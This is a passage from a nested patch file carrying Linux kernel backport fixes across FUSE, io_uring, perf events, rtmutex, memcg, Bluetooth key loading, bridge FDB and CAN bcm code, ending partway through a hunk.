+ /* bits 32..63 get shifted down 32 bits into the flags2 field */
+ #define FUSE_SECURITY_CTX	(1ULL << 32)
+ #define FUSE_HAS_INODE_DAX	(1ULL << 33)
++#define FUSE_HAS_EXPIRE_ONLY	(1ULL << 35)
+ 
+ /**
+  * CUSE INIT request/reply flags
+@@ -491,6 +502,21 @@ struct fuse_file_lock {
+  */
+ #define FUSE_SETXATTR_ACL_KILL_SGID	(1 << 0)
+ 
++/**
++ * notify_inval_entry flags
++ * FUSE_EXPIRE_ONLY
++ */
++#define FUSE_EXPIRE_ONLY		(1 << 0)
++
++/**
++ * extension type
++ * FUSE_MAX_NR_SECCTX: maximum value of &fuse_secctx_header.nr_secctx
++ */
++enum fuse_ext_type {
++	/* Types 0..31 are reserved for fuse_secctx_header */
++	FUSE_MAX_NR_SECCTX	= 31,
++};
++
+ enum fuse_opcode {
+ 	FUSE_LOOKUP		= 1,
+ 	FUSE_FORGET		= 2,  /* no reply */
+@@ -874,7 +900,8 @@ struct fuse_in_header {
+ 	uint32_t	uid;
+ 	uint32_t	gid;
+ 	uint32_t	pid;
+-	uint32_t	padding;
++	uint16_t	total_extlen; /* length of extensions in 8byte units */
++	uint16_t	padding;
+ };
+ 
+ struct fuse_out_header {
+@@ -919,7 +946,7 @@ struct fuse_notify_inval_inode_out {
+ struct fuse_notify_inval_entry_out {
+ 	uint64_t	parent;
+ 	uint32_t	namelen;
+-	uint32_t	padding;
++	uint32_t	flags;
+ };
+ 
+ struct fuse_notify_delete_out {
+@@ -1035,4 +1062,17 @@ struct fuse_secctx_header {
+ 	uint32_t	nr_secctx;
+ };
+ 
++/**
++ * struct fuse_ext_header - extension header
++ * @size: total size of this extension including this header
++ * @type: type of extension
++ *
++ * This is made compatible with fuse_secctx_header by using type values >
++ * FUSE_MAX_NR_SECCTX
++ */
++struct fuse_ext_header {
++	uint32_t	size;
++	uint32_t	type;
++};
++
+ #endif /* _LINUX_FUSE_H */
+diff --git a/io_uring/io-wq.c b/io_uring/io-wq.c
+index 04503118cdc10..139cd49b2c270 100644
+--- a/io_uring/io-wq.c
++++ b/io_uring/io-wq.c
+@@ -628,7 +628,7 @@ static int io_wqe_worker(void *data)
+ 	struct io_wqe_acct *acct = io_wqe_get_acct(worker);
+ 	struct io_wqe *wqe = worker->wqe;
+ 	struct io_wq *wq = wqe->wq;
+-	bool last_timeout = false;
++	bool exit_mask = false, last_timeout = false;
+ 	char buf[TASK_COMM_LEN];
+ 
+ 	worker->flags |= (IO_WORKER_F_UP | IO_WORKER_F_RUNNING);
+@@ -644,8 +644,11 @@ static int io_wqe_worker(void *data)
+ 			io_worker_handle_work(worker);
+ 
+ 		raw_spin_lock(&wqe->lock);
+-		/* timed out, exit unless we're the last worker */
+-		if (last_timeout && acct->nr_workers > 1) {
++		/*
++		 * Last sleep timed out. Exit if we're not the last worker,
++		 * or if someone modified our affinity.
++		 */
++		if (last_timeout && (exit_mask || acct->nr_workers > 1)) {
+ 			acct->nr_workers--;
+ 			raw_spin_unlock(&wqe->lock);
+ 			__set_current_state(TASK_RUNNING);
+@@ -664,7 +667,11 @@ static int io_wqe_worker(void *data)
+ 				continue;
+ 			break;
+ 		}
+-		last_timeout = !ret;
++		if (!ret) {
++			last_timeout = true;
++			exit_mask = !cpumask_test_cpu(raw_smp_processor_id(),
++							wqe->cpu_mask);
++		}
+ 	}
+ 
+ 	if (test_bit(IO_WQ_BIT_EXIT, &wq->state))
+@@ -716,7 +723,6 @@ static void io_init_new_worker(struct io_wqe *wqe, struct io_worker *worker,
+ 	tsk->worker_private = worker;
+ 	worker->task = tsk;
+ 	set_cpus_allowed_ptr(tsk, wqe->cpu_mask);
+-	tsk->flags |= PF_NO_SETAFFINITY;
+ 
+ 	raw_spin_lock(&wqe->lock);
+ 	hlist_nulls_add_head_rcu(&worker->nulls_node, &wqe->free_list);
+diff --git a/io_uring/sqpoll.c b/io_uring/sqpoll.c
+index 11610a70573ab..6ea21b5031138 100644
+--- a/io_uring/sqpoll.c
++++ b/io_uring/sqpoll.c
+@@ -233,7 +233,6 @@ static int io_sq_thread(void *data)
+ 		set_cpus_allowed_ptr(current, cpumask_of(sqd->sq_cpu));
+ 	else
+ 		set_cpus_allowed_ptr(current, cpu_online_mask);
+-	current->flags |= PF_NO_SETAFFINITY;
+ 
+ 	/*
+ 	 * Force audit context to get setup, in case we do prep side async
+diff --git a/kernel/bpf/btf.c b/kernel/bpf/btf.c
+index bb88fd2266a86..95a050446f271 100644
+--- a/kernel/bpf/btf.c
++++ b/kernel/bpf/btf.c
+@@ -466,10 +466,16 @@ static bool btf_type_is_fwd(const struct btf_type *t)
+ 	return BTF_INFO_KIND(t->info) == BTF_KIND_FWD;
+ }
+ 
++static bool btf_type_is_decl_tag(const struct btf_type *t)
++{
++	return BTF_INFO_KIND(t->info) == BTF_KIND_DECL_TAG;
++}
++
+ static bool btf_type_nosize(const struct btf_type *t)
+ {
+ 	return btf_type_is_void(t) || btf_type_is_fwd(t) ||
+-	       btf_type_is_func(t) || btf_type_is_func_proto(t);
++	       btf_type_is_func(t) || btf_type_is_func_proto(t) ||
++	       btf_type_is_decl_tag(t);
+ }
+ 
+ static bool btf_type_nosize_or_null(const struct btf_type *t)
+@@ -492,11 +498,6 @@ static bool btf_type_is_datasec(const struct btf_type *t)
+ 	return BTF_INFO_KIND(t->info) == BTF_KIND_DATASEC;
+ }
+ 
+-static bool btf_type_is_decl_tag(const struct btf_type *t)
+-{
+-	return BTF_INFO_KIND(t->info) == BTF_KIND_DECL_TAG;
+-}
+-
+ static bool btf_type_is_decl_tag_target(const struct btf_type *t)
+ {
+ 	return btf_type_is_func(t) || btf_type_is_struct(t) ||
+diff --git a/kernel/cgroup/cgroup.c b/kernel/cgroup/cgroup.c
+index 455f67ff31b57..f6656fd410d0f 100644
+--- a/kernel/cgroup/cgroup.c
++++ b/kernel/cgroup/cgroup.c
+@@ -1852,9 +1852,9 @@ int rebind_subsystems(struct cgroup_root *dst_root, u16 ss_mask)
+ 		RCU_INIT_POINTER(scgrp->subsys[ssid], NULL);
+ 		rcu_assign_pointer(dcgrp->subsys[ssid], css);
+ 		ss->root = dst_root;
+-		css->cgroup = dcgrp;
+ 
+ 		spin_lock_irq(&css_set_lock);
++		css->cgroup = dcgrp;
+ 		WARN_ON(!list_empty(&dcgrp->e_csets[ss->id]));
+ 		list_for_each_entry_safe(cset, cset_pos, &scgrp->e_csets[ss->id],
+ 					 e_cset_node[ss->id]) {
+diff --git a/kernel/dma/map_benchmark.c b/kernel/dma/map_benchmark.c
+index dafdc47ae5fcc..3efdc5cfe390c 100644
+--- a/kernel/dma/map_benchmark.c
++++ b/kernel/dma/map_benchmark.c
+@@ -89,6 +89,22 @@ static int map_benchmark_thread(void *data)
+ 		atomic64_add(map_sq, &map->sum_sq_map);
+ 		atomic64_add(unmap_sq, &map->sum_sq_unmap);
+ 		atomic64_inc(&map->loops);
++
++		/*
++		 * We may test for a long time so periodically check whether
++		 * we need to schedule to avoid starving the others. Otherwise
++		 * we may hangup the kernel in a non-preemptible kernel when
++		 * the test kthreads number >= CPU number, the test kthreads
++		 * will run endless on every CPU since the thread resposible
++		 * for notifying the kthread stop (in do_map_benchmark())
++		 * could not be scheduled.
++		 *
++		 * Note this may degrade the test concurrency since the test
++		 * threads may need to share the CPU time with other load
++		 * in the system. So it's recommended to run this benchmark
++		 * on an idle system.
++		 */
++		cond_resched();
+ 	}
+ 
+ out:
+diff --git a/kernel/events/core.c b/kernel/events/core.c
+index ba099d5b41cd9..0e9f1377cec7f 100644
+--- a/kernel/events/core.c
++++ b/kernel/events/core.c
+@@ -1277,8 +1277,9 @@ static void put_ctx(struct perf_event_context *ctx)
+  *	  perf_event_context::mutex
+  *	    perf_event::child_mutex;
+  *	      perf_event_context::lock
+- *	    perf_event::mmap_mutex
+  *	    mmap_lock
++ *	      perf_event::mmap_mutex
++ *	        perf_buffer::aux_mutex
+  *	      perf_addr_filters_head::lock
+  *
+  *    cpu_hotplug_lock
+@@ -6181,12 +6182,11 @@ static void perf_mmap_close(struct vm_area_struct *vma)
+ 		event->pmu->event_unmapped(event, vma->vm_mm);
+ 
+ 	/*
+-	 * rb->aux_mmap_count will always drop before rb->mmap_count and
+-	 * event->mmap_count, so it is ok to use event->mmap_mutex to
+-	 * serialize with perf_mmap here.
++	 * The AUX buffer is strictly a sub-buffer, serialize using aux_mutex
++	 * to avoid complications.
+ 	 */
+ 	if (rb_has_aux(rb) && vma->vm_pgoff == rb->aux_pgoff &&
+-	    atomic_dec_and_mutex_lock(&rb->aux_mmap_count, &event->mmap_mutex)) {
++	    atomic_dec_and_mutex_lock(&rb->aux_mmap_count, &rb->aux_mutex)) {
+ 		/*
+ 		 * Stop all AUX events that are writing to this buffer,
+ 		 * so that we can free its AUX pages and corresponding PMU
+@@ -6203,7 +6203,7 @@ static void perf_mmap_close(struct vm_area_struct *vma)
+ 		rb_free_aux(rb);
+ 		WARN_ON_ONCE(refcount_read(&rb->aux_refcount));
+ 
+-		mutex_unlock(&event->mmap_mutex);
++		mutex_unlock(&rb->aux_mutex);
+ 	}
+ 
+ 	if (atomic_dec_and_test(&rb->mmap_count))
+@@ -6291,6 +6291,7 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
+ 	struct perf_event *event = file->private_data;
+ 	unsigned long user_locked, user_lock_limit;
+ 	struct user_struct *user = current_user();
++	struct mutex *aux_mutex = NULL;
+ 	struct perf_buffer *rb = NULL;
+ 	unsigned long locked, lock_limit;
+ 	unsigned long vma_size;
+@@ -6339,6 +6340,9 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
+ 		if (!rb)
+ 			goto aux_unlock;
+ 
++		aux_mutex = &rb->aux_mutex;
++		mutex_lock(aux_mutex);
++
+ 		aux_offset = READ_ONCE(rb->user_page->aux_offset);
+ 		aux_size = READ_ONCE(rb->user_page->aux_size);
+ 
+@@ -6489,6 +6493,8 @@ static int perf_mmap(struct file *file, struct vm_area_struct *vma)
+ 		atomic_dec(&rb->mmap_count);
+ 	}
+ aux_unlock:
++	if (aux_mutex)
++		mutex_unlock(aux_mutex);
+ 	mutex_unlock(&event->mmap_mutex);
+ 
+ 	/*
+diff --git a/kernel/events/internal.h b/kernel/events/internal.h
+index 386d21c7edfa0..f376b057320ce 100644
+--- a/kernel/events/internal.h
++++ b/kernel/events/internal.h
+@@ -40,6 +40,7 @@ struct perf_buffer {
+ 	struct user_struct		*mmap_user;
+ 
+ 	/* AUX area */
++	struct mutex			aux_mutex;
+ 	long				aux_head;
+ 	unsigned int			aux_nest;
+ 	long				aux_wakeup;	/* last aux_watermark boundary crossed by aux_head */
+diff --git a/kernel/events/ring_buffer.c b/kernel/events/ring_buffer.c
+index f3a3c294ff2b3..98588e96b5919 100644
+--- a/kernel/events/ring_buffer.c
++++ b/kernel/events/ring_buffer.c
+@@ -332,6 +332,8 @@ ring_buffer_init(struct perf_buffer *rb, long watermark, int flags)
+ 	 */
+ 	if (!rb->nr_pages)
+ 		rb->paused = 1;
++
++	mutex_init(&rb->aux_mutex);
+ }
+ 
+ void perf_aux_output_flag(struct perf_output_handle *handle, u64 flags)
+diff --git a/kernel/events/uprobes.c b/kernel/events/uprobes.c
+index d9e357b7e17c9..f8bda852c6b48 100644
+--- a/kernel/events/uprobes.c
++++ b/kernel/events/uprobes.c
+@@ -1483,7 +1483,7 @@ static struct xol_area *__create_xol_area(unsigned long vaddr)
+ 	uprobe_opcode_t insn = UPROBE_SWBP_INSN;
+ 	struct xol_area *area;
+ 
+-	area = kmalloc(sizeof(*area), GFP_KERNEL);
++	area = kzalloc(sizeof(*area), GFP_KERNEL);
+ 	if (unlikely(!area))
+ 		goto out;
+ 
+@@ -1493,7 +1493,6 @@ static struct xol_area *__create_xol_area(unsigned long vaddr)
+ 		goto free_area;
+ 
+ 	area->xol_mapping.name = "[uprobes]";
+-	area->xol_mapping.fault = NULL;
+ 	area->xol_mapping.pages = area->pages;
+ 	area->pages[0] = alloc_page(GFP_HIGHUSER);
+ 	if (!area->pages[0])
+diff --git a/kernel/locking/rtmutex.c b/kernel/locking/rtmutex.c
+index 21db0df0eb000..bf3a28ee7d8f4 100644
+--- a/kernel/locking/rtmutex.c
++++ b/kernel/locking/rtmutex.c
+@@ -1624,6 +1624,7 @@ static int __sched rt_mutex_slowlock_block(struct rt_mutex_base *lock,
+ }
+ 
+ static void __sched rt_mutex_handle_deadlock(int res, int detect_deadlock,
++					     struct rt_mutex_base *lock,
+ 					     struct rt_mutex_waiter *w)
+ {
+ 	/*
+@@ -1636,10 +1637,10 @@ static void __sched rt_mutex_handle_deadlock(int res, int detect_deadlock,
+ 	if (build_ww_mutex() && w->ww_ctx)
+ 		return;
+ 
+-	/*
+-	 * Yell loudly and stop the task right here.
+-	 */
++	raw_spin_unlock_irq(&lock->wait_lock);
++
+ 	WARN(1, "rtmutex deadlock detected\n");
++
+ 	while (1) {
+ 		set_current_state(TASK_INTERRUPTIBLE);
+ 		schedule();
+@@ -1693,7 +1694,7 @@ static int __sched __rt_mutex_slowlock(struct rt_mutex_base *lock,
+ 	} else {
+ 		__set_current_state(TASK_RUNNING);
+ 		remove_waiter(lock, waiter);
+-		rt_mutex_handle_deadlock(ret, chwalk, waiter);
++		rt_mutex_handle_deadlock(ret, chwalk, lock, waiter);
+ 	}
+ 
+ 	/*
+diff --git a/kernel/resource.c b/kernel/resource.c
+index 8f52f88009652..6aed1ca801829 100644
+--- a/kernel/resource.c
++++ b/kernel/resource.c
+@@ -1781,8 +1781,7 @@ static resource_size_t gfr_start(struct resource *base, resource_size_t size,
+ 	if (flags & GFR_DESCENDING) {
+ 		resource_size_t end;
+ 
+-		end = min_t(resource_size_t, base->end,
+-			    (1ULL << MAX_PHYSMEM_BITS) - 1);
++		end = min_t(resource_size_t, base->end, PHYSMEM_END);
+ 		return end - size + 1;
+ 	}
+ 
+@@ -1799,8 +1798,7 @@ static bool gfr_continue(struct resource *base, resource_size_t addr,
+ 	 * @size did not wrap 0.
+ 	 */
+ 	return addr > addr - size &&
+-	       addr <= min_t(resource_size_t, base->end,
+-			     (1ULL << MAX_PHYSMEM_BITS) - 1);
++	       addr <= min_t(resource_size_t, base->end, PHYSMEM_END);
+ }
+ 
+ static resource_size_t gfr_next(resource_size_t addr, resource_size_t size,
+diff --git a/kernel/smp.c b/kernel/smp.c
+index 63e466bb6b03a..0acd433afa7bc 100644
+--- a/kernel/smp.c
++++ b/kernel/smp.c
+@@ -1262,6 +1262,7 @@ int smp_call_on_cpu(unsigned int cpu, int (*func)(void *), void *par, bool phys)
+ 
+ 	queue_work_on(cpu, system_wq, &sscs.work);
+ 	wait_for_completion(&sscs.done);
++	destroy_work_on_stack(&sscs.work);
+ 
+ 	return sscs.ret;
+ }
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index f2b00ea38111a..c9b52e920b8f3 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -4088,6 +4088,8 @@ void tracing_iter_reset(struct trace_iterator *iter, int cpu)
+ 			break;
+ 		entries++;
+ 		ring_buffer_iter_advance(buf_iter);
++		/* This could be a big loop */
++		cond_resched();
+ 	}
+ 
+ 	per_cpu_ptr(iter->array_buffer->data, cpu)->skipped_entries = entries;
+diff --git a/kernel/workqueue.c b/kernel/workqueue.c
+index f3b6ac232e219..93303148a434f 100644
+--- a/kernel/workqueue.c
++++ b/kernel/workqueue.c
+@@ -5891,10 +5891,18 @@ static void wq_watchdog_timer_fn(struct timer_list *unused)
+ 
+ notrace void wq_watchdog_touch(int cpu)
+ {
++	unsigned long thresh = READ_ONCE(wq_watchdog_thresh) * HZ;
++	unsigned long touch_ts = READ_ONCE(wq_watchdog_touched);
++	unsigned long now = jiffies;
++
+ 	if (cpu >= 0)
+-		per_cpu(wq_watchdog_touched_cpu, cpu) = jiffies;
++		per_cpu(wq_watchdog_touched_cpu, cpu) = now;
++	else
++		WARN_ONCE(1, "%s should be called with valid CPU", __func__);
+ 
+-	wq_watchdog_touched = jiffies;
++	/* Don't unnecessarily store to global cacheline */
++	if (time_after(now, touch_ts + thresh / 4))
++		WRITE_ONCE(wq_watchdog_touched, jiffies);
+ }
+ 
+ static void wq_watchdog_set_thresh(unsigned long thresh)
+diff --git a/lib/generic-radix-tree.c b/lib/generic-radix-tree.c
+index 7dfa88282b006..78f081d695d0b 100644
+--- a/lib/generic-radix-tree.c
++++ b/lib/generic-radix-tree.c
+@@ -131,6 +131,8 @@ void *__genradix_ptr_alloc(struct __genradix *radix, size_t offset,
+ 		if ((v = cmpxchg_release(&radix->root, r, new_root)) == r) {
+ 			v = new_root;
+ 			new_node = NULL;
++		} else {
++			new_node->children[0] = NULL;
+ 		}
+ 	}
+ 
+diff --git a/mm/memcontrol.c b/mm/memcontrol.c
+index 4ad6e8345b364..280bb6969c0bf 100644
+--- a/mm/memcontrol.c
++++ b/mm/memcontrol.c
+@@ -5143,11 +5143,28 @@ static struct cftype mem_cgroup_legacy_files[] = {
+  */
+ 
+ static DEFINE_IDR(mem_cgroup_idr);
++static DEFINE_SPINLOCK(memcg_idr_lock);
++
++static int mem_cgroup_alloc_id(void)
++{
++	int ret;
++
++	idr_preload(GFP_KERNEL);
++	spin_lock(&memcg_idr_lock);
++	ret = idr_alloc(&mem_cgroup_idr, NULL, 1, MEM_CGROUP_ID_MAX + 1,
++			GFP_NOWAIT);
++	spin_unlock(&memcg_idr_lock);
++	idr_preload_end();
++	return ret;
++}
+ 
+ static void mem_cgroup_id_remove(struct mem_cgroup *memcg)
+ {
+ 	if (memcg->id.id > 0) {
++		spin_lock(&memcg_idr_lock);
+ 		idr_remove(&mem_cgroup_idr, memcg->id.id);
++		spin_unlock(&memcg_idr_lock);
++
+ 		memcg->id.id = 0;
+ 	}
+ }
+@@ -5270,8 +5287,7 @@ static struct mem_cgroup *mem_cgroup_alloc(void)
+ 	if (!memcg)
+ 		return ERR_PTR(error);
+ 
+-	memcg->id.id = idr_alloc(&mem_cgroup_idr, NULL,
+-				 1, MEM_CGROUP_ID_MAX + 1, GFP_KERNEL);
++	memcg->id.id = mem_cgroup_alloc_id();
+ 	if (memcg->id.id < 0) {
+ 		error = memcg->id.id;
+ 		goto fail;
+@@ -5316,7 +5332,9 @@ static struct mem_cgroup *mem_cgroup_alloc(void)
+ 	INIT_LIST_HEAD(&memcg->deferred_split_queue.split_queue);
+ 	memcg->deferred_split_queue.split_queue_len = 0;
+ #endif
++	spin_lock(&memcg_idr_lock);
+ 	idr_replace(&mem_cgroup_idr, memcg, memcg->id.id);
++	spin_unlock(&memcg_idr_lock);
+ 	lru_gen_init_memcg(memcg);
+ 	return memcg;
+ fail:
+diff --git a/mm/memory_hotplug.c b/mm/memory_hotplug.c
+index 3b9d3a4b43869..dc17618bad8b9 100644
+--- a/mm/memory_hotplug.c
++++ b/mm/memory_hotplug.c
+@@ -1530,7 +1530,7 @@ struct range __weak arch_get_mappable_range(void)
+ 
+ struct range mhp_get_pluggable_range(bool need_mapping)
+ {
+-	const u64 max_phys = (1ULL << MAX_PHYSMEM_BITS) - 1;
++	const u64 max_phys = PHYSMEM_END;
+ 	struct range mhp_range;
+ 
+ 	if (need_mapping) {
+diff --git a/mm/sparse.c b/mm/sparse.c
+index 05d1e7b6c6dba..c803e318f50b5 100644
+--- a/mm/sparse.c
++++ b/mm/sparse.c
+@@ -129,7 +129,7 @@ static inline int sparse_early_nid(struct mem_section *section)
+ static void __meminit mminit_validate_memmodel_limits(unsigned long *start_pfn,
+ 						unsigned long *end_pfn)
+ {
+-	unsigned long max_sparsemem_pfn = 1UL << (MAX_PHYSMEM_BITS-PAGE_SHIFT);
++	unsigned long max_sparsemem_pfn = (PHYSMEM_END + 1) >> PAGE_SHIFT;
+ 
+ 	/*
+ 	 * Sanity checks - do not allow an architecture to pass
+diff --git a/net/bluetooth/mgmt.c b/net/bluetooth/mgmt.c
+index 5b8adfb36e207..c5a3a336515e7 100644
+--- a/net/bluetooth/mgmt.c
++++ b/net/bluetooth/mgmt.c
+@@ -2900,16 +2900,6 @@ static int load_link_keys(struct sock *sk, struct hci_dev *hdev, void *data,
+ 	bt_dev_dbg(hdev, "debug_keys %u key_count %u", cp->debug_keys,
+ 		   key_count);
+ 
+-	for (i = 0; i < key_count; i++) {
+-		struct mgmt_link_key_info *key = &cp->keys[i];
+-
+-		/* Considering SMP over BREDR/LE, there is no need to check addr_type */
+-		if (key->type > 0x08)
+-			return mgmt_cmd_status(sk, hdev->id,
+-					       MGMT_OP_LOAD_LINK_KEYS,
+-					       MGMT_STATUS_INVALID_PARAMS);
+-	}
+-
+ 	hci_dev_lock(hdev);
+ 
+ 	hci_link_keys_clear(hdev);
+@@ -2934,6 +2924,19 @@ static int load_link_keys(struct sock *sk, struct hci_dev *hdev, void *data,
+ 			continue;
+ 		}
+ 
++		if (key->addr.type != BDADDR_BREDR) {
++			bt_dev_warn(hdev,
++				    "Invalid link address type %u for %pMR",
++				    key->addr.type, &key->addr.bdaddr);
++			continue;
++		}
++
++		if (key->type > 0x08) {
++			bt_dev_warn(hdev, "Invalid link key type %u for %pMR",
++				    key->type, &key->addr.bdaddr);
++			continue;
++		}
++
+ 		/* Always ignore debug keys and require a new pairing if
+ 		 * the user wants to use them.
+ 		 */
+@@ -7141,7 +7144,6 @@ static int load_irks(struct sock *sk, struct hci_dev *hdev, void *cp_data,
+ 
+ 	for (i = 0; i < irk_count; i++) {
+ 		struct mgmt_irk_info *irk = &cp->irks[i];
+-		u8 addr_type = le_addr_type(irk->addr.type);
+ 
+ 		if (hci_is_blocked_key(hdev,
+ 				       HCI_BLOCKED_KEY_TYPE_IRK,
+@@ -7151,12 +7153,8 @@ static int load_irks(struct sock *sk, struct hci_dev *hdev, void *cp_data,
+ 			continue;
+ 		}
+ 
+-		/* When using SMP over BR/EDR, the addr type should be set to BREDR */
+-		if (irk->addr.type == BDADDR_BREDR)
+-			addr_type = BDADDR_BREDR;
+-
+ 		hci_add_irk(hdev, &irk->addr.bdaddr,
+-			    addr_type, irk->val,
++			    le_addr_type(irk->addr.type), irk->val,
+ 			    BDADDR_ANY);
+ 	}
+ 
+@@ -7221,15 +7219,6 @@ static int load_long_term_keys(struct sock *sk, struct hci_dev *hdev,
+ 
+ 	bt_dev_dbg(hdev, "key_count %u", key_count);
+ 
+-	for (i = 0; i < key_count; i++) {
+-		struct mgmt_ltk_info *key = &cp->keys[i];
+-
+-		if (!ltk_is_valid(key))
+-			return mgmt_cmd_status(sk, hdev->id,
+-					       MGMT_OP_LOAD_LONG_TERM_KEYS,
+-					       MGMT_STATUS_INVALID_PARAMS);
+-	}
+-
+ 	hci_dev_lock(hdev);
+ 
+ 	hci_smp_ltks_clear(hdev);
+@@ -7237,7 +7226,6 @@ static int load_long_term_keys(struct sock *sk, struct hci_dev *hdev,
+ 	for (i = 0; i < key_count; i++) {
+ 		struct mgmt_ltk_info *key = &cp->keys[i];
+ 		u8 type, authenticated;
+-		u8 addr_type = le_addr_type(key->addr.type);
+ 
+ 		if (hci_is_blocked_key(hdev,
+ 				       HCI_BLOCKED_KEY_TYPE_LTK,
+@@ -7247,6 +7235,12 @@ static int load_long_term_keys(struct sock *sk, struct hci_dev *hdev,
+ 			continue;
+ 		}
+ 
++		if (!ltk_is_valid(key)) {
++			bt_dev_warn(hdev, "Invalid LTK for %pMR",
++				    &key->addr.bdaddr);
++			continue;
++		}
++
+ 		switch (key->type) {
+ 		case MGMT_LTK_UNAUTHENTICATED:
+ 			authenticated = 0x00;
+@@ -7272,12 +7266,8 @@ static int load_long_term_keys(struct sock *sk, struct hci_dev *hdev,
+ 			continue;
+ 		}
+ 
+-		/* When using SMP over BR/EDR, the addr type should be set to BREDR */
+-		if (key->addr.type == BDADDR_BREDR)
+-			addr_type = BDADDR_BREDR;
+-
+ 		hci_add_ltk(hdev, &key->addr.bdaddr,
+-			    addr_type, type, authenticated,
++			    le_addr_type(key->addr.type), type, authenticated,
+ 			    key->val, key->enc_size, key->ediv, key->rand);
+ 	}
+ 
+@@ -9545,7 +9535,7 @@ void mgmt_new_link_key(struct hci_dev *hdev, struct link_key *key,
+ 
+ 	ev.store_hint = persistent;
+ 	bacpy(&ev.key.addr.bdaddr, &key->bdaddr);
+-	ev.key.addr.type = link_to_bdaddr(key->link_type, key->bdaddr_type);
++	ev.key.addr.type = BDADDR_BREDR;
+ 	ev.key.type = key->type;
+ 	memcpy(ev.key.val, key->val, HCI_LINK_KEY_SIZE);
+ 	ev.key.pin_len = key->pin_len;
+@@ -9596,7 +9586,7 @@ void mgmt_new_ltk(struct hci_dev *hdev, struct smp_ltk *key, bool persistent)
+ 		ev.store_hint = persistent;
+ 
+ 	bacpy(&ev.key.addr.bdaddr, &key->bdaddr);
+-	ev.key.addr.type = link_to_bdaddr(key->link_type, key->bdaddr_type);
++	ev.key.addr.type = link_to_bdaddr(LE_LINK, key->bdaddr_type);
+ 	ev.key.type = mgmt_ltk_type(key);
+ 	ev.key.enc_size = key->enc_size;
+ 	ev.key.ediv = key->ediv;
+@@ -9625,7 +9615,7 @@ void mgmt_new_irk(struct hci_dev *hdev, struct smp_irk *irk, bool persistent)
+ 
+ 	bacpy(&ev.rpa, &irk->rpa);
+ 	bacpy(&ev.irk.addr.bdaddr, &irk->bdaddr);
+-	ev.irk.addr.type = link_to_bdaddr(irk->link_type, irk->addr_type);
++	ev.irk.addr.type = link_to_bdaddr(LE_LINK, irk->addr_type);
+ 	memcpy(ev.irk.val, irk->val, sizeof(irk->val));
+ 
+ 	mgmt_event(MGMT_EV_NEW_IRK, hdev, &ev, sizeof(ev), NULL);
+@@ -9654,7 +9644,7 @@ void mgmt_new_csrk(struct hci_dev *hdev, struct smp_csrk *csrk,
+ 		ev.store_hint = persistent;
+ 
+ 	bacpy(&ev.key.addr.bdaddr, &csrk->bdaddr);
+-	ev.key.addr.type = link_to_bdaddr(csrk->link_type, csrk->bdaddr_type);
++	ev.key.addr.type = link_to_bdaddr(LE_LINK, csrk->bdaddr_type);
+ 	ev.key.type = csrk->type;
+ 	memcpy(ev.key.val, csrk->val, sizeof(csrk->val));
+ 
+diff --git a/net/bluetooth/smp.c b/net/bluetooth/smp.c
+index d444fa1bd9f97..b93494790877f 100644
+--- a/net/bluetooth/smp.c
++++ b/net/bluetooth/smp.c
+@@ -1059,7 +1059,6 @@ static void smp_notify_keys(struct l2cap_conn *conn)
+ 	}
+ 
+ 	if (smp->remote_irk) {
+-		smp->remote_irk->link_type = hcon->type;
+ 		mgmt_new_irk(hdev, smp->remote_irk, persistent);
+ 
+ 		/* Now that user space can be considered to know the
+@@ -1074,28 +1073,24 @@ static void smp_notify_keys(struct l2cap_conn *conn)
+ 	}
+ 
+ 	if (smp->csrk) {
+-		smp->csrk->link_type = hcon->type;
+ 		smp->csrk->bdaddr_type = hcon->dst_type;
+ 		bacpy(&smp->csrk->bdaddr, &hcon->dst);
+ 		mgmt_new_csrk(hdev, smp->csrk, persistent);
+ 	}
+ 
+ 	if (smp->responder_csrk) {
+-		smp->responder_csrk->link_type = hcon->type;
+ 		smp->responder_csrk->bdaddr_type = hcon->dst_type;
+ 		bacpy(&smp->responder_csrk->bdaddr, &hcon->dst);
+ 		mgmt_new_csrk(hdev, smp->responder_csrk, persistent);
+ 	}
+ 
+ 	if (smp->ltk) {
+-		smp->ltk->link_type = hcon->type;
+ 		smp->ltk->bdaddr_type = hcon->dst_type;
+ 		bacpy(&smp->ltk->bdaddr, &hcon->dst);
+ 		mgmt_new_ltk(hdev, smp->ltk, persistent);
+ 	}
+ 
+ 	if (smp->responder_ltk) {
+-		smp->responder_ltk->link_type = hcon->type;
+ 		smp->responder_ltk->bdaddr_type = hcon->dst_type;
+ 		bacpy(&smp->responder_ltk->bdaddr, &hcon->dst);
+ 		mgmt_new_ltk(hdev, smp->responder_ltk, persistent);
+@@ -1115,8 +1110,6 @@ static void smp_notify_keys(struct l2cap_conn *conn)
+ 		key = hci_add_link_key(hdev, smp->conn->hcon, &hcon->dst,
+ 				       smp->link_key, type, 0, &persistent);
+ 		if (key) {
+-			key->link_type = hcon->type;
+-			key->bdaddr_type = hcon->dst_type;
+ 			mgmt_new_link_key(hdev, key, persistent);
+ 
+ 			/* Don't keep debug keys around if the relevant
+diff --git a/net/bridge/br_fdb.c b/net/bridge/br_fdb.c
+index e7f4fccb6adb4..882b6a67e11f8 100644
+--- a/net/bridge/br_fdb.c
++++ b/net/bridge/br_fdb.c
+@@ -1388,12 +1388,10 @@ int br_fdb_external_learn_add(struct net_bridge *br, struct net_bridge_port *p,
+ 			modified = true;
+ 		}
+ 
+-		if (test_bit(BR_FDB_ADDED_BY_EXT_LEARN, &fdb->flags)) {
++		if (test_and_set_bit(BR_FDB_ADDED_BY_EXT_LEARN, &fdb->flags)) {
+ 			/* Refresh entry */
+ 			fdb->used = jiffies;
+-		} else if (!test_bit(BR_FDB_ADDED_BY_USER, &fdb->flags)) {
+-			/* Take over SW learned entry */
+-			set_bit(BR_FDB_ADDED_BY_EXT_LEARN, &fdb->flags);
++		} else {
+ 			modified = true;
+ 		}
+ 
+diff --git a/net/can/bcm.c b/net/can/bcm.c
+index 925d48cc50f81..4ecb5cd8a22d0 100644
+--- a/net/can/bcm.c
++++ b/net/can/bcm.c
+@@ -1428,6 +1428,10 @@ static void bcm_notify(struct bcm_sock *bo, unsigned long msg,
+ 
+ 		/* remove device reference, if this is our bound device */
+ 		if (bo->bound && bo->ifindex == dev->ifindex) {
++#if IS_ENABLED(CONFIG_PROC_FS)
++			if (sock_net(sk)->can.bcmproc_dir && bo->bcm_proc_read)
++				remove_proc_entry(bo->procname, sock_net(sk)->can.bcmproc_dir);
++#endif
